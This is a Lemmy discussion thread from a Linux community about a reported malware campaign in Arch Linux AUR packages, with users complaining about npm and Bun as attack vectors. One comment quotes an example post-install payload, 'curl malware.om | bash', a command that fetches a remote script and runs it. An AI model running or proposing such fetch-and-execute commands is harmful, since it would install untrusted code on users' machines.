this post was submitted on 12 Jun 2026

224 points (99.6% liked)

Linux

13955 readers

484 users here now

A community for everything relating to the GNU/Linux operating system (except the memes!)

Also, check out:

Original icon base courtesy of lewing@isc.tamu.edu and The GIMP

founded 3 years ago

MODERATORS

Ategon@programming.dev

anzo@programming.dev

dwraf_of_ignorance@programming.dev

224

Arch Linux AUR Malware Campaign Hits Multiple User-Contributed Packages (linuxiac.com)

submitted 1 day ago by cm0002@lemy.lol to c/linux@programming.dev

65 comments fedilink hide all child comments

you are viewing a single comment's thread
view the rest of the comments

[–] kboy101222@sh.itjust.works 43 points 1 day ago (1 children)

God, even the Arch malware uses npm as a vector. And thus, my hatred of npm deepens even further

[–] ugjka@lemmy.ugjka.net 9 points 23 hours ago (1 children)

Tbf, it is run in package post install section so it could be anything even the typical "curl malware.om | bash". There is a new wave of attacks now pulling things in with Bun which i guess is similar thing to NPM

[–] kboy101222@sh.itjust.works 11 points 22 hours ago

I'm just a web guy whose tired of installing 10 xetabytes of 2 line libraries every time I wanna check out anything web related